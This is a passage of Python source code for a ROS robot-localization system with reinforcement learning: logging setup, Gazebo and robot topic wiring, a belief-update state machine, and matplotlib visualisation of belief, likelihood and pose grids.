Pose2d(0,0,0) self.collision_pose = Pose2d(0,0,0) self.believed_pose = Pose2d(0,0,0) #grid pose self.true_grid = Grid(head=0,row=0,col=0) self.bel_grid = Grid(head=0,row=0,col=0) self.collision_grid = Grid(head=0,row=0,col=0) self.action_space = list(("turn_left", "turn_right", "go_fwd", "hold")) self.action_str = 'none' self.current_state = "new_env_pose" self.obj_act = None self.obj_rew = None self.obj_err = None self.obj_map = None self.obj_robot = None self.obj_heading = None self.obj_robot_bel = None self.obj_heading_bel = None self.obj_pose = None self.obj_scan = None self.obj_gtl = None self.obj_lik = None self.obj_bel = None self.obj_bel_prior = None self.obj_bel_dist = None self.obj_gtl_dist = None self.obj_lik_dist = None self.obj_collision = None if self.args.save: home=os.environ['HOME'] str_date_time = datetime.now().strftime('%Y%m%d-%H%M%S') # 1. try create /logs/YYMMDD-HHMMSS-00 # 2. 
if exist create /logs/YYMMDD-HHMMSS-01, and so on i = 0 dir_made=False while dir_made==False: # self.log_dir = os.path.join(home, anl_loc, 'logs/', str_date_time+'-%02d'%i) # self.log_dir = os.path.join(home, self.args.save_loc, str_date_time+'-%02d'%i) self.log_dir = os.path.join(self.args.save_loc, str_date_time+'-%02d'%i) try: os.mkdir(self.log_dir) dir_made=True except OSError as exc: if exc.errno != errno.EEXIST: raise pass i=i+1 if self.args.verbose > 0: print ('new directory %s'%self.log_dir) self.param_filepath = os.path.join(self.log_dir, 'param.txt') with open(self.param_filepath,'w+') as param_file: for arg in vars(self.args): param_file.write('<%s=%s> '%(arg, getattr(self.args, arg))) if self.args.verbose > -1: print ('parameters saved at %s'%self.param_filepath) self.log_filepath = os.path.join(self.log_dir, 'log.txt') self.rollout_list = os.path.join(self.log_dir, 'rollout_list.txt') self.pm_filepath = os.path.join(self.log_dir, 'perceptual.model') self.rl_filepath = os.path.join(self.log_dir, 'rl.model') self.ir_filepath = os.path.join(self.log_dir, 'ir.model') self.data_path = os.path.join(self.log_dir, 'data') self.fig_path = os.path.join(self.log_dir, 'figures') # if self.args.save_data: try: os.mkdir(self.data_path) except OSError as exc: if exc.errno != errno.EEXIST: raise pass if self.args.figure: try: os.mkdir(self.fig_path) except OSError as exc: if exc.errno != errno.EEXIST: raise pass self.twist_msg_move = Twist() self.twist_msg_move.linear.x = 0 self.twist_msg_move.linear.y = 0 self.twist_msg_move.angular.z = 0 self.twist_msg_stop = Twist() self.twist_msg_stop.linear.x = 0 self.twist_msg_stop.linear.y = 0 self.twist_msg_stop.angular.z = 0 #Subscribers #self.sub_map = rospy.Subscriber('map', OccupancyGrid, self.cbMap, queue_size = 1) # self.sub_odom = rospy.Subscriber('odom', Odometry, self.cbOdom, queue_size # = 1) self.dal_pose = PoseStamped() self.pose_seq_cnt = 0 if self.args.gazebo: self.sub_laser_scan = rospy.Subscriber('scan', LaserScan, self.cbScan, queue_size = 1) self.pub_cmdvel = rospy.Publisher('cmd_vel', Twist, queue_size = 1) self.pub_dalpose = rospy.Publisher('dal_pose', PoseStamped, queue_size = 1) # self.sub_odom = rospy.Subscriber('odom', Odometry, self.cbOdom, queue_size = 1) elif self.args.jay1: self.pub_cmdvel = rospy.Publisher('jay1/cmd_vel', Twist, queue_size = 1) self.pub_dalpose = rospy.Publisher('dal_pose', PoseStamped, queue_size = 1) self.sub_laser_scan = rospy.Subscriber('jay1/scan', LaserScan, self.cbScanTop, queue_size = 1) self.sub_laser_scan = rospy.Subscriber('jay1/scan1', LaserScan, self.cbScanBottom, queue_size = 1) self.sub_robot_pose = rospy.Subscriber('jay1/robot_pose', PoseStamped, self.cbRobotPose, queue_size = 1) self.sub_odom = rospy.Subscriber('jay1/odom', Odometry, self.cbOdom, queue_size = 1) self.client = actionlib.SimpleActionClient('jay1/move_base', MoveBaseAction) self.client.wait_for_server() rospy.loginfo("Waiting for move_base action server...") wait = self.client.wait_for_server(rospy.Duration(5.0)) if not wait: rospy.logerr("Action server not available!") rospy.signal_shutdown("Action server not available!") exit() rospy.loginfo("Connected to move base server") rospy.loginfo("Starting goals achievements ...") if self.args.gazebo or self.args.jay1: rospy.Timer(rospy.Duration(self.args.timer), self.loop_jay) self.max_turn_rate = 1.0 self.turn_gain = 10 self.fwd_err_margin = 0.005 self.ang_err_margin = math.radians(0.2) self.fsm_state = "init" #end of init def loop(self): if self.current_state == "new_env_pose": 
### place objects in the env self.clear_objects() if self.args.load_map == None: self.set_maze_grid() self.set_walls() elif self.args.load_map == 'randombox': self.random_box() else: self.read_map() self.map_for_LM = fill_outer_rim(self.map_for_LM, self.map_rows, self.map_cols) if self.args.distort_map: self.map_for_LM = distort_map(self.map_for_LM, self.map_rows, self.map_cols) self.make_low_dim_maps() if self.args.gtl_off == False: self.get_synth_scan_mp(self.scans_over_map, map_img=self.map_for_LM, xlim=self.xlim, ylim=self.ylim) # generate synthetic scan data over the map (and directions) self.reset_explored() placed = self.place_turtle() if placed: self.current_state = "update_likelihood" else: print ("place turtle failed. retrying a new map") return if self.args.figure==True: self.update_figure(newmap=True) elif self.current_state == "new_pose": self.reset_explored() self.place_turtle() self.current_state = "update_likelihood" elif self.current_state == "update_likelihood": self.get_lidar() self.update_explored() if self.step_count == 0: self.save_roll_out = self.args.save & np.random.choice([False, True], p=[1.0-self.args.prob_roll_out, self.args.prob_roll_out]) if self.save_roll_out: #save roll-out for next episode. self.roll_out_filepath = os.path.join(self.log_dir, 'roll-out-%03d-%03d.txt'%(self.env_count,self.episode_count)) print ('roll-out saving: %s'%self.roll_out_filepath) self.scan_2d, self.scan_2d_low = self.get_scan_2d_n_headings(self.scan_data, self.xlim, self.ylim) self.slide_scan() ### 2. update likelihood from observation self.compute_gtl(self.scans_over_map) if self.args.generate_data: # end the episode ... (no need for measurement/motion model) self.generate_data() if self.args.figure: self.update_figure() plt.pause(1e-4) self.next_step() return self.likelihood = self.update_likelihood_rotate(self.map_for_LM, self.scan_2d) if self.args.mask: self.mask_likelihood() #self.likelihood.register_hook(print) ### z(t) = like x belief ### z(t) = like x belief # if self.collision == False: self.product_belief() ### reward r(t) self.update_bel_list() self.get_reward() ### action a(t) given s(t) = (z(t)|Map) if self.args.verbose>0: self.report_status(end_episode=False) if self.save_roll_out: self.collect_data() if self.args.figure: self.update_figure() self.run_action_module() if self.skip_to_end: self.skip_to_end = False self.next_ep() return ### environment: set target self.update_target_pose() # do the rest: ation, trans-belief, update gt self.collision_check() self.execute_action_teleport() ### environment: change belief z_hat(t+1) self.transit_belief() ### increase time step # self.update_current_pose() if self.collision == False: self.update_true_grid() ## Prior ## # if self.args.figure: # ax=self.ax_prior # self.update_prior_plot(ax) # ax=self.ax_map # self.draw_robot(ax) # self.draw_bel(ax) # self.draw_collision(ax, self.collision) # ax=self.ax_pose # self.update_pose_plot(ax) # plt.pause(1e-3) self.next_step() return else: print("undefined state name %s"%self.current_state) self.current_state = None exit() return def get_statistics(self, dis, name): DIRS = 'NWSE' this=[] for i in range(self.grid_dirs): # this.append('%s(%s%1.3f,%s%1.3f,%s%1.3f%s)'\ # %(DIRS[i], bcolors.WARNING,100*dis[i,:,:].max(), # bcolors.OKGREEN,100*dis[i,:,:].median(), # bcolors.FAIL,100*dis[i,:,:].min(),bcolors.ENDC)) this.append(' %s(%1.2f,%1.2f,%1.2f)'\ %(DIRS[i], 100*dis[i,:,:].max(), 100*dis[i,:,:].median(), 100*dis[i,:,:].min())) return name+':%19s|%23s|%23s|%23s|'%tuple(this[th] for th in 
range(self.grid_dirs)) def circular_placement(self, x, n): width = x.shape[2] height = x.shape[1] N = (n/2+1)*max(width,height) img = np.zeros((N,N)) for i in range(n): if i < n/4: origin = (i, (n/4-i)) elif i < 2*n/4: origin = (i, (i-n/4)) elif i < 3*n/4: origin = (n-i, (i-n/4)) else: origin = (n-i, n+n/4-i) ox = origin[0]*height oy = origin[1]*width img[ox:ox+height, oy:oy+width] = x[i,:,:] return img def square_clock(self, x, n): width = x.shape[2] height = x.shape[1] quater = n/4-1 #even/odd even = 1 - quater % 2 side = quater+2+even N = side*max(width,height) img = np.zeros((N,N)) for i in range(n): s = (i+n/8)%n if s < n/4: org = (0, n/4-s) elif s < n/2: org = (s-n/4+even, 0) elif s < 3*n/4: org = (n/4+even, s-n/2+even) else: org = (n/4-(s-3*n/4), n/4+even) ox = org[0]*height oy = org[1]*width img[ox:ox+height, oy:oy+width] = x[i,:,:] del x return img, side def draw_compass(self, ax): cx = 0.9 * self.xlim[1] cy = 0.9 * self.ylim[0] lengthNS = self.xlim[1] * 0.1 lengthEW = self.ylim[1] * 0.075 theta = - self.current_pose.theta Nx = cx + lengthNS * np.cos(theta) Ny = cy + lengthNS* np.sin(theta) Sx = cx + lengthNS * np.cos(theta+np.pi) Sy = cy + lengthNS * np.sin(theta+np.pi) Ni = to_index(Nx, self.map_rows, self.xlim) Nj = to_index(Ny, self.map_cols, self.ylim) Si = to_index(Sx, self.map_rows, self.xlim) Sj = to_index(Sy, self.map_cols, self.ylim) Ex = cx + lengthEW * np.cos(theta-np.pi/2) Ey = cy + lengthEW * np.sin(theta-np.pi/2) Wx = cx + lengthEW * np.cos(theta+np.pi/2) Wy = cy + lengthEW * np.sin(theta+np.pi/2) Ei = to_index(Ex, self.map_rows, self.xlim) Ej = to_index(Ey, self.map_cols, self.ylim) Wi = to_index(Wx, self.map_rows, self.xlim) Wj = to_index(Wy, self.map_cols, self.ylim) xdata = Sj, Nj, Wj, Ej ydata = Si, Ni, Wi, Ei if hasattr(self, 'obj_compass1'): self.obj_compass1.update({'xdata':xdata, 'ydata':ydata}) else: self.obj_compass1, = ax.plot(xdata, ydata, 'r', alpha = 0.5) def draw_center(self, ax): x = to_index(0, self.map_rows, self.xlim) y = to_index(0, self.map_cols, self.ylim) # radius = self.map_rows*0.4/self.grid_rows radius = self.cr_pixels # self.collision_radius / (self.xlim[1]-self.xlim[0]) * self.map_rows theta = 0-np.pi/2 xdata = y, y+radius*3*np.cos(theta) ydata = x, x+radius*3*np.sin(theta) obj_robot = Wedge((y,x), radius, 0, 360, color='r',alpha=0.5) obj_heading, = ax.plot(xdata, ydata, 'r', alpha=0.5) ax.add_artist(obj_robot) def draw_collision(self, ax, collision): if collision == False: if self.obj_collision == None: return else: self.obj_collision.update({'visible':False}) else: x = to_index(self.collision_pose.x, self.map_rows, self.xlim) y = to_index(self.collision_pose.y, self.map_cols, self.ylim) radius = self.cr_pixels #self.collision_radius / (self.xlim[1]-self.xlim[0]) * self.map_rows if self.obj_collision == None: self.obj_collision = Wedge((y,x), radius, 0, 360, color='y',alpha=0.5, visible=True) ax.add_artist(self.obj_collision) else: self.obj_collision.update({'center': [y,x], 'visible':True}) # self.obj_robot.set_data(self.turtle_loc) # plt.pause(0.01) def draw_robot(self, ax): x = to_index(self.current_pose.x, self.map_rows, self.xlim) y = to_index(self.current_pose.y, self.map_cols, self.ylim) # radius = self.map_rows*0.4/self.grid_rows radius = self.cr_pixels # self.collision_radius / (self.xlim[1]-self.xlim[0]) * self.map_rows theta = -self.current_pose.theta-np.pi/2 xdata = y, y+radius*3*np.cos(theta) ydata = x, x+radius*3*np.sin(theta) if self.obj_robot == None: #self.obj_robot = ax.imshow(self.turtle_loc, alpha=0.5, 
cmap=plt.cm.binary) # self.obj_robot = ax.imshow(self.turtle_loc, alpha=0.5, cmap=plt.cm.Reds,interpolation='nearest') self.obj_robot = Wedge((y,x), radius, 0, 360, color='r',alpha=0.5) self.obj_heading, = ax.plot(xdata, ydata, 'r', alpha=0.5) ax.add_artist(self.obj_robot) else: self.obj_robot.update({'center': [y,x]}) self.obj_heading.update({'xdata':xdata, 'ydata':ydata}) # self.obj_robot.set_data(self.turtle_loc) # plt.pause(0.01) def update_believed_pose(self): o_bel,i_bel,j_bel = np.unravel_index(np.argmax(self.belief.cpu().detach().numpy(), axis=None), self.belief.shape) x_bel = to_real(i_bel, self.xlim,self.grid_rows) y_bel = to_real(j_bel, self.ylim,self.grid_cols) theta = o_bel * self.heading_resol self.believed_pose.x = x_bel self.believed_pose.y = y_bel self.believed_pose.theta = theta self.publish_dal_pose(x_bel, y_bel, theta) def publish_dal_pose(self,x,y,theta): self.dal_pose.pose.position.x = -y self.dal_pose.pose.position.y = x self.dal_pose.pose.position.z = 0 quatern = quaternion_from_euler(0,0, theta+np.pi/2) self.dal_pose.pose.orientation.x=quatern[0] self.dal_pose.pose.orientation.y=quatern[1] self.dal_pose.pose.orientation.z=quatern[2] self.dal_pose.pose.orientation.w=quatern[3] self.dal_pose.header.frame_id = 'map' self.dal_pose.header.seq = self.pose_seq_cnt self.pose_seq_cnt += 1 self.pub_dalpose.publish(self.dal_pose) def update_map_T_odom(self): map_pose = (self.believed_pose.x, self.believed_pose.y, self.believed_pose.theta) odom_pose = (self.odom_pose.x, self.odom_pose.y, self.odom_pose.theta) self.map_T_odom = define_tf(map_pose, odom_pose) def draw_bel(self, ax): o_bel,i_bel,j_bel = np.unravel_index(np.argmax(self.belief.cpu().detach().numpy(), axis=None), self.belief.shape) x_bel = to_real(i_bel, self.xlim,self.grid_rows) y_bel = to_real(j_bel, self.ylim,self.grid_cols) x = to_index(x_bel, self.map_rows, self.xlim) y = to_index(y_bel, self.map_cols, self.ylim) # radius = self.map_rows*0.4/self.grid_rows radius = self.cr_pixels # self.collision_radius / (self.xlim[1]-self.xlim[0]) * self.map_rows theta = o_bel * self.heading_resol theta = -theta-np.pi/2 xdata = y, y+radius*3*np.cos(theta) ydata = x, x+radius*3*np.sin(theta) if self.obj_robot_bel == None: #self.obj_robot = ax.imshow(self.turtle_loc, alpha=0.5, cmap=plt.cm.binary) # self.obj_robot = ax.imshow(self.turtle_loc, alpha=0.5, cmap=plt.cm.Reds,interpolation='nearest') self.obj_robot_bel = Wedge((y,x), radius*0.95, 0, 360, color='b',alpha=0.5) self.obj_heading_bel, = ax.plot(xdata, ydata, 'b', alpha=0.5) ax.add_artist(self.obj_robot_bel) else: self.obj_robot_bel.update({'center': [y,x]}) self.obj_heading_bel.update({'xdata':xdata, 'ydata':ydata}) def init_figure(self): self.init_fig = True if self.args.figure == True:# and self.obj_fig==None: self.obj_fig = plt.figure(figsize=(16,12)) plt.set_cmap('viridis') self.gridspec = gridspec.GridSpec(3,5) self.ax_map = plt.subplot(self.gridspec[0,0]) self.ax_scan = plt.subplot(self.gridspec[1,0]) self.ax_pose = plt.subplot(self.gridspec[2,0]) self.ax_bel = plt.subplot(self.gridspec[0,1]) self.ax_lik = plt.subplot(self.gridspec[1,1]) self.ax_gtl = plt.subplot(self.gridspec[2,1]) # self.ax_prior = plt.subplot(self.gridspec[2,1]) self.ax_pbel = plt.subplot(self.gridspec[0,2:4]) self.ax_plik = plt.subplot(self.gridspec[1,2:4]) self.ax_pgtl = plt.subplot(self.gridspec[2,2:4]) self.ax_act = plt.subplot(self.gridspec[0,4]) self.ax_rew = plt.subplot(self.gridspec[1,4]) self.ax_err = plt.subplot(self.gridspec[2,4]) plt.subplots_adjust(hspace = 0.4, wspace=0.4, top=0.95, 
bottom=0.05) def update_figure(self, newmap=False): if self.init_fig==False: self.init_figure() if newmap: ax=self.ax_map if self.obj_map == None: # self.ax_map = ax self.obj_map = ax.imshow(self.map_for_LM, cmap=plt.cm.binary,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.map_rows,self.grid_rows,endpoint=False) ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") else: self.obj_map.set_data(self.map_for_LM) self.draw_robot(ax) return ax=self.ax_map self.draw_robot(ax) self.draw_bel(ax) self.draw_collision(ax, self.collision) ax=self.ax_scan if self.obj_scan == None: self.obj_scan = ax.imshow(self.scan_2d[0,:,:], cmap = plt.cm.binary,interpolation='gaussian') self.obj_scan_slide = ax.imshow(self.scan_2d_slide[:,:], cmap = plt.cm.Blues,interpolation='gaussian', alpha=0.5) # self.obj_scan_low = ax.imshow(cv2.resize(1.0*self.scan_2d_low[:,:], (self.map_rows, self.map_cols), interpolation=cv2.INTER_NEAREST), cmap = plt.cm.binary,interpolation='nearest', alpha=0.5) self.draw_center(ax) self.draw_compass(ax) ax.set_title('LiDAR Scan') else: self.obj_scan.set_data(self.scan_2d[0,:,:]) # self.obj_scan_low.set_data(cv2.resize(1.0*self.scan_2d_low[:,:], (self.map_rows, self.map_cols), interpolation=cv2.INTER_NEAREST)) self.obj_scan_slide.set_data(self.scan_2d_slide[:,:]) self.draw_compass(ax) ax=self.ax_pose self.update_pose_plot(ax) ## GTL ## if self.args.gtl_off: pass else: ax=self.ax_gtl self.update_gtl_plot(ax) ## BELIEF ## ax=self.ax_bel self.update_belief_plot(ax) ## LIKELIHOOD ## ax=self.ax_lik self.update_likely_plot(ax) ax=self.ax_pbel self.update_bel_dist(ax) ax=self.ax_pgtl self.update_gtl_dist(ax) ax=self.ax_plik self.update_lik_dist(ax) # show last step, and save if self.step_count >= self.step_max-1: self.ax_map.set_title('action(%d):%s'%(self.step_count,"")) # self.prob = np.array([0,0,0]) # self.action_from_policy=-1 self.clear_act_dist(self.ax_act) act_lttr=['L','R','F','-'] self.obj_rew= self.update_list(self.ax_rew,self.rewards,self.obj_rew,"Reward", text=act_lttr[self.action_idx]) self.obj_err = self.update_list(self.ax_err,self.xyerrs,self.obj_err,"Error") plt.pause(1e-4) self.save_figure() def save_figure(self): if self.args.save and self.acc_epi_cnt % self.args.figure_save_freq == 0: figname=os.path.join(self.fig_path,'%03d-%03d-%03d.png'%(self.env_count, self.episode_count, self.step_count)) plt.savefig(figname) if self.args.verbose > 1: print (figname) def update_pose_plot(self, ax): pose = np.zeros((self.grid_rows,self.grid_cols,3)) pose[:,:,0] = 1-self.map_for_pose pose[:,:,1] = 1-self.map_for_pose pose[:,:,2] = 1-self.map_for_pose if (pose[self.true_grid.row, self.true_grid.col,:] == [0, 0, 0]).all(): pose[self.true_grid.row, self.true_grid.col, :] = [0.5, 0, 0] # pose[self.true_grid.row, self.true_grid.col, 2] = [0.5, 0, 0] elif (pose[self.true_grid.row, self.true_grid.col,:] == [1, 1, 1]).all(): pose[self.true_grid.row, self.true_grid.col, :] = [1.0, 0, 0] if (pose[self.bel_grid.row, self.bel_grid.col, :] == [0,0,0]).all(): pose[self.bel_grid.row, self.bel_grid.col, :] = [0,0,0.5] elif (pose[self.bel_grid.row, self.bel_grid.col, :] == [1,1,1]).all(): pose[self.bel_grid.row, self.bel_grid.col, :] = [0,0,1] elif (pose[self.bel_grid.row, self.bel_grid.col, :] == [1,0,0]).all(): pose[self.bel_grid.row, self.bel_grid.col, :] = [.5,0,.5] elif (pose[self.bel_grid.row, self.bel_grid.col, :] == [0.5,0,0]).all(): pose[self.bel_grid.row, 
                 self.bel_grid.col, :] = [0.25, 0, 0.25]
        if self.collision:
            pose[min(self.grid_rows-1, max(0, self.collision_grid.row)),
                 min(self.grid_cols-1, max(0, self.collision_grid.col)), :] = [0.5, 0.5, 0]
        if self.obj_pose == None:
            self.obj_pose = ax.imshow(pose, cmap=plt.cm.binary, interpolation='nearest')
            ax.grid()
            ax.set_yticks(np.arange(0, self.grid_rows)-0.5)
            ax.set_xticks(np.arange(0, self.grid_cols)-0.5)
            ax.tick_params(axis='y', labelleft='off')
            ax.tick_params(axis='x', labelbottom='off')
            ax.tick_params(bottom="off", left="off")
            ax.set_title("Occupancy Grid")
        else:
            self.obj_pose.set_data(pose)

    def update_likely_plot(self, ax):
        lik = self.likelihood.cpu().detach().numpy()
        # if lik.min() == lik.max():
        #     lik *= 0
        # lik -= lik.min()
        # lik /= lik.max()
        lik, side = self.square_clock(lik, self.grid_dirs)
        # lik = self.circular_placement(lik, self.grid_dirs)
        # lik = lik.reshape(self.grid_rows*self.grid_dirs, self.grid_cols)
        # lik = np.swapaxes(lik, 0, 1)
        # lik = lik.reshape(self.grid_rows, self.grid_dirs*self.grid_cols)
        # lik = np.concatenate((lik[0,:,:], lik[1,:,:], lik[2,:,:], lik[3,:,:]), axis=1)
        if self.obj_lik == None:
            self.obj_lik = ax.imshow(lik, interpolation='nearest')
            ax.grid()
            ticks = np.linspace(0, self.grid_rows*side, side, endpoint=False)-0.5
            ax.set_yticks(ticks)
            ax.set_xticks(ticks)
            ax.tick_params(axis='y', labelleft='off')
            ax.tick_params(axis='x', labelbottom='off')
            ax.tick_params(bottom="off", left="off")
            ax.set_title('Likelihood from NN')
        else:
            self.obj_lik.set_data(lik)
            self.obj_lik.set_norm(norm=cm.Normalize().autoscale(lik))

    def update_act_dist(self, ax):
        y = self.prob.flatten()
        if self.obj_act == None:
            x = range(y.size)
            self.obj_act = ax.bar(x, y)
            ax.set_ylim([0, 1.1])
            ax.set_title("Action PDF")
            ax.set_xticks(np.array([0, 1, 2]))
            ax.set_xticklabels(('L', 'R', 'F'))
            self.obj_act_act = None
        else:
            for bar, a in zip(self.obj_act, y):
                bar.set_height(a)
        if self.obj_act_act == None:
            if self.action_from_policy != -1:
                self.obj_act_act = ax.text(self.action_from_policy, y[self.action_from_policy], '*')
        else:
            if self.action_from_policy != -1:
                self.obj_act_act.set_position((self.action_from_policy, y[self.action_from_policy]))

    def clear_act_dist(self, ax):
        ax.clear()
        if self.obj_act == None:
            pass
        else:
            self.obj_act = None
        if self.obj_act_act == None:
            pass
        else:
            self.obj_act_act = None

    def update_list(self, ax, y, obj, title, text=None):
        # y = self.rewards
        x = range(len(y))
        if obj == None:
            obj, = ax.plot(x, y, '.-')
            ax.set_title(title)
        else:
            obj.set_ydata(y)
            obj.set_xdata(x)
            if text is not None:
                ax.text(x[-1], y[-1], text)
            # recompute the ax.dataLim
            ax.relim()
            # update ax.viewLim using the new dataLim
            ax.autoscale_view()
        return obj

    def update_bel_dist(self, ax):
        y = (self.belief.cpu().detach().numpy().flatten())
        gt = np.zeros_like(self.belief.cpu().detach().numpy())
        gt[self.true_grid.head, self.true_grid.row, self.true_grid.col] = 1
        gt = gt.flatten()
        gt_x = np.argmax(gt)
        if self.obj_bel_dist == None:
            x = range(y.size)
            self.obj_bel_dist, = ax.plot(x, y, '.')
            self.obj_bel_max, = ax.plot(np.argmax(y), np.max(y), 'x', color='r', label='bel')
            self.obj_gt_bel, = ax.plot(gt_x, y[gt_x], '^', color='r', label='gt')
            ax.legend()
            self.obj_bel_val = ax.text(np.argmax(y), np.max(y), "%f" % np.max(y))
            ax.set_ylim([0, y.max()*2])
            # ax.set_ylabel('Belief')
            # ax.set_xlabel('Pose')
            ax.set_title("Belief")
        else:
            self.obj_bel_dist.set_ydata(y)
            self.obj_bel_max.set_xdata(np.argmax(y))
            self.obj_bel_max.set_ydata(np.max(y))
            self.obj_gt_bel.set_xdata(gt_x)
            self.obj_gt_bel.set_ydata(y[gt_x])
            self.obj_bel_val.set_position((np.argmax(y),
np.max(y))) self.obj_bel_val.set_text("%f"%np.max(y)) ax.set_ylim([0, y.max()*2]) def update_gtl_dist(self,ax): # y = (self.gt_likelihood.cpu().detach().numpy().flatten()) y = self.gt_likelihood.flatten() if self.obj_gtl_dist == None: x = range(y.size) self.obj_gtl_dist, = ax.plot(x,y,'.') self.obj_gtl_max, = ax.plot(np.argmax(y), np.max(y), 'rx') ax.set_ylim([0, y.max()*2]) # ax.set_ylabel('GTL') # ax.set_xlabel('Pose') ax.set_title("GTL") else: self.obj_gtl_dist.set_ydata(y) self.obj_gtl_max.set_ydata(np.max(y)) self.obj_gtl_max.set_xdata(np.argmax(y)) ax.set_ylim([0, y.max()*2]) def update_lik_dist(self,ax): y = (self.likelihood.cpu().detach().numpy().flatten()) if self.obj_lik_dist == None: x = range(y.size) self.obj_lik_dist, = ax.plot(x,y,'.') self.obj_lik_max, = ax.plot(np.argmax(y), np.max(y), 'rx') ax.set_ylim([0, y.max()*2]) # ax.set_ylabel('Likelihood') # ax.set_xlabel('Pose') ax.set_title("Likelihood") else: self.obj_lik_dist.set_ydata(y) self.obj_lik_max.set_ydata(np.max(y)) self.obj_lik_max.set_xdata(np.argmax(y)) ax.set_ylim([0, y.max()*2]) def update_belief_plot(self,ax): bel = self.belief.cpu().detach().numpy() # if bel.min() == bel.max(): # bel *= 0 # bel -= bel.min() # bel /= bel.max() bel,side = self.square_clock(bel, self.grid_dirs) #bel=self.circular_placement(bel, self.grid_dirs) # bel = bel.reshape(self.grid_rows*self.grid_dirs,self.grid_cols) # bel = np.swapaxes(bel,0,1) # bel = bel.reshape(self.grid_rows,self.grid_dirs*self.grid_cols) # bel = np.concatenate((bel[0,:,:],bel[1,:,:],bel[2,:,:],bel[3,:,:]), axis=1) if self.obj_bel == None: self.obj_bel = ax.imshow(bel,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.grid_rows*side, side,endpoint=False)-0.5 ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") ax.set_title('Belief (%.3f)'%self.belief.cpu().detach().numpy().max()) else: self.obj_bel.set_data(bel) ax.set_title('Belief (%.3f)'%self.belief.cpu().detach().numpy().max()) self.obj_bel.set_norm(norm = cm.Normalize().autoscale(bel)) def update_prior_plot(self,ax): bel = np.copy(self.prior) bel,side = self.square_clock(bel, self.grid_dirs) if self.obj_bel_prior == None: self.obj_bel_prior = ax.imshow(bel,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.grid_rows*side, side,endpoint=False)-0.5 ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") ax.set_title('Prior (%.3f)'%self.prior.max()) else: self.obj_bel_prior.set_data(bel) ax.set_title('Prior (%.3f)'%self.prior.max()) self.obj_bel_prior.set_norm(norm = cm.Normalize().autoscale(bel)) def update_gtl_plot(self,ax): # gtl = self.gt_likelihood.cpu().detach().numpy() gtl = self.gt_likelihood gtl, side = self.square_clock(gtl, self.grid_dirs) if self.obj_gtl == None: self.obj_gtl = ax.imshow(gtl,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.grid_rows*side, side,endpoint=False)-0.5 ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") ax.set_title('Target Likelihood') else: self.obj_gtl.set_data(gtl) self.obj_gtl.set_norm(norm = cm.Normalize().autoscale(gtl)) def report_status(self,end_episode=False): if end_episode: reward = sum(self.rewards) loss = self.loss_ll #sum(self.loss_likelihood) dist = sum(self.manhattans) else: reward = 
self.rewards[-1] loss = self.loss_ll dist = self.manhattan eucl = self.get_euclidean() if self.optimizer == None: lr_rl = 0 else: lr_rl = self.optimizer.param_groups[0]['lr'] if self.optimizer_pm == None: lr_pm = 0 else: lr_pm = self.optimizer_pm.param_groups[0]['lr'] if self.args.save: with open(self.log_filepath,'a') as flog: flog.write('%d %d %d %f %f %f %f %f %f %f %f %e %e %f\n'%(self.env_count, self.episode_count,self.step_count, loss, dist, reward, self.loss_policy, self.loss_value, self.prob[0,0],self.prob[0,1],self.prob[0,2], lr_rl, lr_pm, eucl )) print('%d %d %d %f %f %f %f %f %f %f %f %e %e %f'%(self.env_count, self.episode_count,self.step_count, loss, dist, reward, self.loss_policy, self.loss_value, self.prob[0,0],self.prob[0,1],self.prob[0,2], lr_rl, lr_pm, eucl )) def process_link_state(self, pose): return np.array([ pose.position.x, pose.position.y, pose.position.z, pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w ]) def process_model_state(self, pose): return np.array([ pose.position.x, pose.position.y, pose.position.z, pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w ]) def update_current_pose_from_gazebo(self): rospy.wait_for_service('/gazebo/get_model_state') loc = self.get_model_state(self.robot_model_name,'') qtn=loc.pose.orientation roll,pitch,yaw=quaternion_to_euler_angle(qtn.w, qtn.x, qtn.y, qtn.z) self.current_pose = Pose2d(theta=yaw, x=loc.pose.position.x, y=loc.pose.position.y) def update_current_pose_from_robot(self): self.current_pose.x = self.live_pose.x self.current_pose.y = self.live_pose.y self.current_pose.theta = self.live_pose.theta def update_true_grid(self): self.true_grid.row=to_index(self.current_pose.x, self.grid_rows, self.xlim) self.true_grid.col=to_index(self.current_pose.y, self.grid_cols, self.ylim) heading = self.current_pose.theta self.true_grid.head = self.grid_dirs * wrap(heading + np.pi/self.grid_dirs) / 2.0 / np.pi self.true_grid.head = int(self.true_grid.head % self.grid_dirs) def sync_goal_to_true_grid(self): self.perturbed_goal_pose.x = to_real(self.true_grid.row, self.xlim, self.grid_rows) self.perturbed_goal_pose.y = to_real(self.true_grid.col, self.ylim, self.grid_cols) self.perturbed_goal_pose.theta = self.heading_resol*self.true_grid.head def sync_goal_to_current(self): self.goal_pose.x = self.current_pose.x self.goal_pose.y = self.current_pose.y self.goal_pose.theta = self.current_pose.theta self.perturbed_goal_pose.x = self.current_pose.x self.perturbed_goal_pose.y = self.current_pose.y self.perturbed_goal_pose.theta = self.current_pose.theta def init_motion_control(self): # self.start_pose = self.believed_pose self.t_motion_init = time.time() # self.wait_for_scan = True return def do_motion_control(self): start_pose = self.believed_pose goal_pose = self.perturbed_goal_pose # soft copy ! 
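    # --- Standalone sketch (not part of this class): the frame bookkeeping used by
    # update_map_T_odom() and do_motion_control() below. map_T_odom is defined as
    # map_T_base * inv(odom_T_base) at the moment the believed pose is trusted;
    # afterwards each fresh odometry reading is pushed through map_T_odom to get a
    # map-frame pose estimate. The repo's own helpers (define_tf, tuple_to_hg,
    # hg_to_tuple) are defined elsewhere; the *_demo functions here are simplified
    # stand-ins for illustration only.
    #
    # import numpy as np
    #
    # def tuple_to_hg_demo(pose):                  # (x, y, theta) -> 3x3 homogeneous matrix
    #     x, y, th = pose
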